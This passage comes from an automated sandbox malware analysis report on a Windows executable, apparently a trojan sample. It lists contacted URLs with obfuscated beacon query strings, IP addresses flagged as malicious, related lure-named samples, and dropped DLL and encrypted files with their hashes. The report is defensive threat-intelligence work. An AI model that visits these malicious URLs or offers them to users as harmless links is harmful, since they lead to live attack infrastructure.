http://www.ndk168.com/4qdc/?sxlpdB=fgRLe1wDsIR582SpVqHNrqc5X9FQKzC9eNMuu75MPd7YekjVZ2QEORs18XDbgwZ5UcjJ&2dz=onbha	true	Avira URL Cloud: safe	unknown
http://www.pcareinc.com/4qdc/?sxlpdB=n05rnph+IqNz0mbSS5vp9sGjLY7dyqnysY607r4vHHjCLr3ziiRBE07QjlPjM5GqarqD&2dz=onbha	true	Avira URL Cloud: safe	unknown
http://www.speedysnacksbox.com/4qdc/?sxlpdB=oetlJbthpq9VCk3sxGtc819EDOSw/wKhNDSOaTnbk4bTW9QfHQR4t80kWNVKaJln9Y1c&2dz=onbha	true	Avira URL Cloud: safe	unknown
http://www.beconfidentagain.com/4qdc/?sxlpdB=uT9syTVFNHzfIlw/vi0ORJwgGNlm67yR3EiChoWxlToAUfSEqT6/a/KF0zmtzwOHQ1u8&2dz=onbha	true	Avira URL Cloud: safe	unknown
http://www.edgewooddhr.net/4qdc/?sxlpdB=+7VgHCQQJYO0FHfoX4VwpMGRpMkf/fkwbCKrV3wMZoe5nkwvpaAzoW+aSblNd7Hd+wjC&2dz=onbha	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://i4.cdn-image.com/__media__/pics/27586/searchbtn.png)	raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false		high
http://i4.cdn-image.com/__media__/pics/27587/Left.png)	raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i4.cdn-image.com/__media__/pics/27587/Right.png)	raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2	raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot	raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf	raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix	raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i4.cdn-image.com/__media__/pics/27587/BG_2.png)	raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://rdfs.org/sioc/ns#	raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold	raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false		high
https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css	raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	false		high
http://rdfs.org/sioc/types#	raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	lpdKSOB78u.exe	false		high
http://www.carterandcone.coml	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff	raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false		high
http://nsis.sf.net/NSIS_Error	lpdKSOB78u.exe	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmp	false		high
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf	raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
23.253.73.122	unknown	United States	33070	RMH-14US	false
104.21.76.239	unknown	United States	13335	CLOUDFLARENETUS	true
154.213.108.250	unknown	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	true
208.91.197.27	unknown	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
34.102.136.180	unknown	United States	15169	GOOGLEUS	true
23.224.206.45	unknown	United States	40065	CNSERVERSUS	true
92.249.45.191	unknown	Germany	47583	AS-HOSTINGERLT	true
3.223.115.185	unknown	United States	14618	AMAZON-AESUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356515
Start date:	23.02.2021
Start time:	09:17:28
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	lpdKSOB78u.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/4@14/8
EGA Information:	Failed
HDC Information:	Successful, ratio: 34.3% (good quality ratio 31.6%) Quality average: 76.3% Quality standard deviation: 30.8%
HCA Information:	Successful, ratio: 85% Number of executed functions: 99 Number of non-executed functions: 61
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.255.188.83, 92.122.145.220, 104.43.139.144, 23.218.208.56, 51.104.144.132, 2.20.142.209, 2.20.142.210, 13.88.21.125, 104.42.151.234, 40.88.32.150, 13.64.90.137, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194, 51.104.139.180 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
23.253.73.122	2021_50SG0BK00T1,pdf.exe	Get hash	malicious	Browse	www.401ne19thstapt51.com/cp5/?3f_XA=hpZTHLMX0ZZH-r60&QZ3d8LAX=ST+LfgkElT/1H9Jw1Cyu0Cb/bA/WmsIE2G+aC3RmwHqguDB9pCvn9MOnwx44n8GGpEoPouHAqQ==
208.91.197.27	quotation10204168.dox.xlsx	Get hash	malicious	Browse	www.ineedahealer.com/nsag/?ixlp=JZt/EqKnkk88uQzCb0KdX1akBsX1rsQmEOLu4l27VNFjN7FE106rAJ9hVfsmewbBp56lFQ==&3f=7nD434
	0C18PUs3bt.exe	Get hash	malicious	Browse	www.frosteatlove.com/bf3/?iBZXwFk=X2JDkFjsMB6oiMyBAGTb4d3tPaSm6c7icrr5HuDcvbFyYv5YREvwfdTxLqFl/7r7Jeq3&NVBl5J=ZL0xqv5pzne
	Credit Card & Booking details.exe	Get hash	malicious	Browse	www.kismetestatestjohn.com/t052/?FdC4EBD=KvGQV7cjXg135hApTJSz4iafnhUzaNx6EODl1sYeuqVoe1jjVqrS5qn370ynoXGDvWf+EXFreg==&Ajn=9r48E
	FEB_2021.EXE	Get hash	malicious	Browse	www.sedaskincare.com/bw82/?rp=Tct1hGrRxJlPW5L07y4OUHCQTPZT/SHKJbcfcrplVOxuukZzhozfqvNA7L+5N35Dyu+I&RR=YrHlp8D
	2021_036,pdf.exe	Get hash	malicious	Browse	www.soulmohal.com/gh6n/?Wr=MhnHMfv8-&iB=O3iu4EyxEdX8GeoftoUZiygb2TBlHeOjx8LRR6x5skYQPsdwOmAYfAw6shfBkhhRknVb
	IMG_Scanned_0522.xls	Get hash	malicious	Browse	www.frosteatlove.com/bf3/?BDK062R=X2JDkFjpMG6sic+NCGTb4d3tPaSm6c7icrzpbtfdr7FzYeVeWU+8JZrzIPpz7rvICd3Huw==&jpal0=w8-tyBwXslWt6d
	IMG_29866.doc	Get hash	malicious	Browse	www.frosteatlove.com/bf3/?AZ=X2JDkFjpMG6sic+NCGTb4d3tPaSm6c7icrzpbtfdr7FzYeVeWU+8JZrzIPpz7rvICd3Huw==&7nU0ar=lL0dilH
	AWB_SHIPPING_DOCUMENT_pdf.exe	Get hash	malicious	Browse	www.cryoportsementanks.com/me2z/?absDxBr=c71ZlLycAP9vtUdXTswIZT0f6gk7ZnCWJULxBqLIpWMAO1vLxUYUWu1Q9U6SRUY9Pq2s&pPX=EFQpsLbPFZvt
	YWrrcqVAno.exe	Get hash	malicious	Browse	www.sedaskincare.com/bw82/?OhNhA=9rUlSVPXQJJ&u8iLW=Tct1hGrRxJlPW5L07y4OUHCQTPZT/SHKJbcfcrplVOxuukZzhozfqvNA7IeDdmZ7oJfP
	documents_0084568546754.exe	Get hash	malicious	Browse	www.realtyelitellc.com/hpg3/?AnB=O2Mxhrspi&GzuX=Dv1dJ2aFhtwqLEHBjuoAgsAjZuQI0JL0Kzuj51RrQpGO2MCPSskldYmRh5X9lQObLYGH
	D6mimHOcsr.exe	Get hash	malicious	Browse	www.sedaskincare.com/bw82/?7n=Tct1hGrRxJlPW5L07y4OUHCQTPZT/SHKJbcfcrplVOxuukZzhozfqvNA7L+5N35Dyu+I&RZ=Y4C4ZlKPDRhPDXy
	KTFvWHZDMe.exe	Get hash	malicious	Browse	www.sedaskincare.com/bw82/?b6l=Tct1hGrRxJlPW5L07y4OUHCQTPZT/SHKJbcfcrplVOxuukZzhozfqvNA7IeDdmZ7oJfP&D8S=_DKHFd
	PO81105083.xlsx	Get hash	malicious	Browse	www.cushcaps.com/j5an/?L2JH=jVhshilfYSq0DTvn3BzXyK00Fz5FDWfMp4UZNuaXB8uirAlJ7c5PwGQAympXcSSWCA2QJw==&0n=fxlL
	tuMCqH36OF.exe	Get hash	malicious	Browse	www.sedaskincare.com/bw82/?hDK0_pJP=Tct1hGrRxJlPW5L07y4OUHCQTPZT/SHKJbcfcrplVOxuukZzhozfqvNA7LyABWVDloiZJVVeiA==&r0=yV8d8L-x7H
	2021 DOCS.xlsx	Get hash	malicious	Browse	www.sedaskincare.com/bw82/?Bxo4nDP=Tct1hGrUxOlLWpH45y4OUHCQTPZT/SHKJbEPAo1kRuxvuV11m4iT8r1C4ty/GGtInIK/Qg==&pJE=YXglJj4Py
	SecuriteInfo.com.Trojan.PackedNET.509.28611.exe	Get hash	malicious	Browse	www.authenicblackculture.com/irux/?jrTDmXz=8RpgMNJDk3KsHiSmUfzszg7B1ozMcD8nUYNynOeLnRBOxtHhQxlGH8zICpt3470hqqY8&w0G=QfuhEjjHhHqD5v4
	wkHpvThL2E.exe	Get hash	malicious	Browse	www.sedaskincare.com/bw82/?9rjLp0Dp=Tct1hGrRxJlPW5L07y4OUHCQTPZT/SHKJbcfcrplVOxuukZzhozfqvNA7L+5N35Dyu+I&LL0=X4XHMNm0l
	catalogo TAWI group.exe	Get hash	malicious	Browse	www.naughtykittyllc.com/nu8e/?cjoT_=In-HJZLp1x18_R&Fzr4zJRP=FPavNoXXLrzGJJiSArqhsqzspCkyIbp9eqESG6QeoRm3xWwhFA95bcAQWxt3RX/6ASCllA6U6A==
	New Purchase Order NoI-701-PDF.exe	Get hash	malicious	Browse	www.mucunamedicalfood.com/onga/?uN6L=fdfLu6i8&1btDy44=Jae84SPpxhN9GbeFpiHm0amLdVRdQaUVlus0gbJUezCkzeOPfe8OL+rl7tRsewH7zre3cAUoNA==
	scan_118637_pdf.exe	Get hash	malicious	Browse	www.phaniesart.com/p2he/?Lh0h=ZTypVLqp5&oPqpRL=icfkNqa6XJP4n3Ds1epycN8jh9wbj43PzfYx4om7yx5StPMzm4ADSLJkUk6kzxSL5MjzXPpd8g==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com	Order_20180218001.exe	Get hash	malicious	Browse	3.223.115.185
	IMG_01670_Scanned.doc	Get hash	malicious	Browse	3.223.115.185
	shed.exe	Get hash	malicious	Browse	3.223.115.185
	IMG_7189012.exe	Get hash	malicious	Browse	3.223.115.185
	Shinshin Machinery.exe	Get hash	malicious	Browse	3.223.115.185
	DHL Shipment Notification 7465649870.pdf.exe	Get hash	malicious	Browse	3.223.115.185
	InterTech_Inquiry.exe	Get hash	malicious	Browse	3.223.115.185
	urBYw8AG15.exe	Get hash	malicious	Browse	3.223.115.185
	fuS9xa8nq6.exe	Get hash	malicious	Browse	3.223.115.185
	MV SEIYO FORTUNE REF 27 - QUOTATION.xlsx	Get hash	malicious	Browse	3.223.115.185
	executable.2772.exe	Get hash	malicious	Browse	3.223.115.185
	PO-098907654467.xlsx	Get hash	malicious	Browse	3.223.115.185
	Docs.exe	Get hash	malicious	Browse	3.223.115.185
	Vghj5O8TF2rYH85.exe	Get hash	malicious	Browse	3.223.115.185
	SecuriteInfo.com.generic.ml.exe	Get hash	malicious	Browse	3.223.115.185
	DOC_KDB_06790-80.xlsx	Get hash	malicious	Browse	3.223.115.185
	IRS_Microsoft_Excel_Document_xls.jar	Get hash	malicious	Browse	3.223.115.185
	RFQ.# PO41000202103.exe	Get hash	malicious	Browse	3.223.115.185
	PREP LIST.doc	Get hash	malicious	Browse	3.223.115.185
	HwL7D1UcZG.exe	Get hash	malicious	Browse	3.223.115.185
www.larek.store	ORDER LIST.xlsx	Get hash	malicious	Browse	185.104.45.146
sequoia.bostonlogic.com	2021_50SG0BK00T1,pdf.exe	Get hash	malicious	Browse	23.253.73.122

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
RMH-14US	message_zdm (2).html	Get hash	malicious	Browse	72.32.12.81
	swift copy pdf.exe	Get hash	malicious	Browse	162.209.66.142
	Purchase Order _pdf.exe	Get hash	malicious	Browse	162.209.66.142
	purchase order doc.exe	Get hash	malicious	Browse	162.209.66.142
	Inquiry pdf.exe	Get hash	malicious	Browse	104.130.255.68
	2021_50SG0BK00T1,pdf.exe	Get hash	malicious	Browse	23.253.73.122
	2VTQ0DkeC4.exe	Get hash	malicious	Browse	104.130.255.68
	P. I.xlsx	Get hash	malicious	Browse	104.130.255.68
	http://www.marketingprofs.com/images/email/7C84B0C9B698F30F466A07D02BBC03833022287036FD27DE94AC9E784E55BE26F82BCF9823CED845F9EB7678AC4BF8712C8706717C1D9550A8908F3EBB5048467449316403F75F7046CC9031D19F9D65/lgor.gif	Get hash	malicious	Browse	72.3.191.176
	http://mail.wwip.com	Get hash	malicious	Browse	166.78.154.137
	http://q5sxv.info/XNsp8N34Lx	Get hash	malicious	Browse	23.253.76.142
	chrisx.exe	Get hash	malicious	Browse	162.209.66.24
	http://174.143.146.246/~cosmo/vfghv.html	Get hash	malicious	Browse	174.143.146.246
	http://rs112.zol.co.zw	Get hash	malicious	Browse	66.216.86.92
	c7dh0AJEXM.exe	Get hash	malicious	Browse	23.253.126.58
	https://kmwconstruction.com/	Get hash	malicious	Browse	174.143.65.160
	http://kmwconstruction.com	Get hash	malicious	Browse	174.143.65.160
CLOUDFLARENETUS	PURCHASE ITEMS.exe	Get hash	malicious	Browse	172.67.172.17
	Shipping Document PL&BL Draft.exe	Get hash	malicious	Browse	172.67.188.154
	CN-Invoice-XXXXX9808-19011143287992.exe	Get hash	malicious	Browse	172.67.172.17
	Halkbank_Ekstre_20210223_082357_541079.exe	Get hash	malicious	Browse	172.67.188.154
	quotation_PR # 00459182..exe	Get hash	malicious	Browse	172.67.172.17
	FOB offer_1164087223_I0133P2100363812.PDF.exe	Get hash	malicious	Browse	104.21.19.200
	PURCHASE ORDER CONFIRMATION.exe	Get hash	malicious	Browse	172.67.188.154
	22 FEB -PROCESSING.xlsx	Get hash	malicious	Browse	172.67.160.246
	Yao Han Industries 61007-51333893QR001U,pdf.exe	Get hash	malicious	Browse	172.67.188.154
	PAYMENTADVICENOTE103_SWIFTCOPY0909208.exe	Get hash	malicious	Browse	172.67.172.17
	ORDER LIST.xlsx	Get hash	malicious	Browse	23.227.38.74
	(appproved)WJO-TT180,pdf.exe	Get hash	malicious	Browse	104.21.19.200
	purchase order.exe	Get hash	malicious	Browse	172.67.188.154
	9073782912,pdf.exe	Get hash	malicious	Browse	172.67.188.154
	SOS URGENT RFQ #2345.exe	Get hash	malicious	Browse	104.21.19.200
	INV_PR2201.docm	Get hash	malicious	Browse	162.159.134.233
	XP 6.xlsx	Get hash	malicious	Browse	172.67.172.17
	b0PmDaDeNh.dll	Get hash	malicious	Browse	104.20.184.68
	PO_210222.exe	Get hash	malicious	Browse	23.227.38.74
	Sw5kF7zkty.exe	Get hash	malicious	Browse	162.159.134.233

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\h1luljvls0ea.dll	ORDER LIST.xlsx	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\nsr575.tmp\System.dll	523JHfbGM1.exe	Get hash	malicious	Browse
	TAk8jeG5ob.exe	Get hash	malicious	Browse
	PAYMENT COPY.exe	Get hash	malicious	Browse
	ORDER LIST.xlsx	Get hash	malicious	Browse
	Orderoffer.exe	Get hash	malicious	Browse
	Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exe	Get hash	malicious	Browse
	INV_PR2201.docm	Get hash	malicious	Browse
	CV-JOB REQUEST______PDF.EXE	Get hash	malicious	Browse
	Request for Quotation.exe	Get hash	malicious	Browse
	#U007einvoice#U007eSC00978656.xlsx	Get hash	malicious	Browse
	Purchase Order___pdf ____________.exe	Get hash	malicious	Browse
	quote.exe	Get hash	malicious	Browse
	Order83930.exe	Get hash	malicious	Browse
	Invoice 6500TH21Y5674.exe	Get hash	malicious	Browse
	Invoice 6500TH21Y5674.exe	Get hash	malicious	Browse
	GPP.exe	Get hash	malicious	Browse
	OrderSuppliesQuote0817916.exe	Get hash	malicious	Browse
	ACCOUNT DETAILS.exe	Get hash	malicious	Browse
	Quotation.com.exe	Get hash	malicious	Browse
	Unterlagen PDF.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\gnozo.to Download File
Process:	C:\Users\user\Desktop\lpdKSOB78u.exe
File Type:	data
Category:	dropped
Size (bytes):	164352
Entropy (8bit):	7.998821656833136
Encrypted:	true
SSDEEP:	3072:fUg86Ct0w2hlcy7em7/58mdrJqnEFSgbo11gctxilAYhY8Bck+oUgnsBOZwATntw:fUGq0w2PcyaIeEo11gctwhY8pegsI/za
MD5:	59AE456E24441D5E7F9F4D2DFF1DD1EB
SHA1:	8BA26F46F1A65A49868400743D436655925978BD
SHA-256:	B51CFCEAB1182BC387D9D9BFEE94F63568BDBB6053EADD8F16EFA13AD4F1CF42
SHA-512:	E9B4E67FA5396CB4735EA0A8820008D15B76327ED4859A5C94CF2701101C8691C729C341BB3878F6E14C1D601BEB9F63BF37374505FD9B628058BAA2B592D792
Malicious:	false
Reputation:	low
Preview:	U0..h.v.S.93..T..E....Xn.ne+.....<.bE.h.h^"."..j...\..y0...m..Uz^w..p..%..' .\|HAb.2....`....)$T...k(F<.[..r.+.N.a.._.(.3.L.DGI.ot...(....`..........H..,..:.t..p,%..y..,>..{l....d......_.\..).\|}".Om.T..{.4(.E..D.e;.y.-.....sT.+..@;.2......<....si....H......~`z."..L.Z^...'./Q.K3..$da...W.3.?7.\|f..y..1.n...+u..\...b`...)....u. ....q.:.:.-.M.jm.0.......\|.U..\|..+...&(..cU...4.v..[..x-,C.W.:......-.a...j8.a.i...1f.-.f:.Y$.._..+....h...a......"..&.`.....8..7@.k}).\|.t[..T..v..~>Sh..l..yVw..w....6^....k......0...j.V....j\.V.@g.r{?.\..8..Sy.I...n[/...3.ipw.......!..4....p.........&..!`.~..-.p...".R#...._...V....f@>[....9N.8.%$.3.;xt.. @ik...M..B.8$.\|..o.....,.@8.....r.W..]%....K.]..\|..5m.F_....a.].~.1.e...['.Db?.......2...Q'.@...K\|fR...%^.j.W....r...K..``9G..a..k....X...(...\<zY.,........F..Zc..N..n..&.}w{.{.l.f.p`..1.U.o-O...%DW. .5P.u.:s...h..f.Y3e..c....p'..9..3..pU.v.T....2....\.+]...v.^..R.m.=0.........3..w...D..m .:..TvG...IG^d.E...F6.

C:\Users\user\AppData\Local\Temp\h1luljvls0ea.dll Download File
Process:	C:\Users\user\Desktop\lpdKSOB78u.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	6.685010863062865
Encrypted:	false
SSDEEP:	192:TXpDSLwlu1zjaFBo4T655+7JHmIQ+HWjDDR+:j4P0Xj6kHeF
MD5:	1C0F964867E07CAC225A8CE5429F5737
SHA1:	8129559E23C4985E024CD18C42DB54EFFC45B72F
SHA-256:	41B9F5241987338FAA262090BEAB1ADF4A9821497011BBE87D3A770F2C926666
SHA-512:	EF6E7764E4B57DFFE5A66C5154FF556802BF94F142070DB2B2B179CB8DF19FB45A176212818FDBA8D6D1994ABF4E2152BBC2BE76757B00D818230CE862A5AD80
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 22%
Joe Sandbox View:	Filename: ORDER LIST.xlsx, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............e.N.e.N.e.N.e.N.e.NI..N.e.N..cN.e.N..gN.e.N..dN.e.N..aN.e.NRich.e.N................PE..L....G4`...........!.........&............... ...............................p............@.........................P$..I.... .......P.......................`..d.................................................... ...............................code............................... ....rdata....... ......................@..@.data........0......................@....rsrc........P.......*..............@..@.reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsr575.tmp\System.dll Download File
Process:	C:\Users\user\Desktop\lpdKSOB78u.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.855045165595541
Encrypted:	false
SSDEEP:	192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
MD5:	FCCFF8CB7A1067E23FD2E2B63971A8E1
SHA1:	30E2A9E137C1223A78A0F7B0BF96A1C361976D91
SHA-256:	6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
SHA-512:	F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 523JHfbGM1.exe, Detection: malicious, Browse Filename: TAk8jeG5ob.exe, Detection: malicious, Browse Filename: PAYMENT COPY.exe, Detection: malicious, Browse Filename: ORDER LIST.xlsx, Detection: malicious, Browse Filename: Orderoffer.exe, Detection: malicious, Browse Filename: Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exe, Detection: malicious, Browse Filename: INV_PR2201.docm, Detection: malicious, Browse Filename: CV-JOB REQUEST______PDF.EXE, Detection: malicious, Browse Filename: Request for Quotation.exe, Detection: malicious, Browse Filename: #U007einvoice#U007eSC00978656.xlsx, Detection: malicious, Browse Filename: Purchase Order___pdf ____________.exe, Detection: malicious, Browse Filename: quote.exe, Detection: malicious, Browse Filename: Order83930.exe, Detection: malicious, Browse Filename: Invoice 6500TH21Y5674.exe, Detection: malicious, Browse Filename: Invoice 6500TH21Y5674.exe, Detection: malicious, Browse Filename: GPP.exe, Detection: malicious, Browse Filename: OrderSuppliesQuote0817916.exe, Detection: malicious, Browse Filename: ACCOUNT DETAILS.exe, Detection: malicious, Browse Filename: Quotation.com.exe, Detection: malicious, Browse Filename: Unterlagen PDF.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
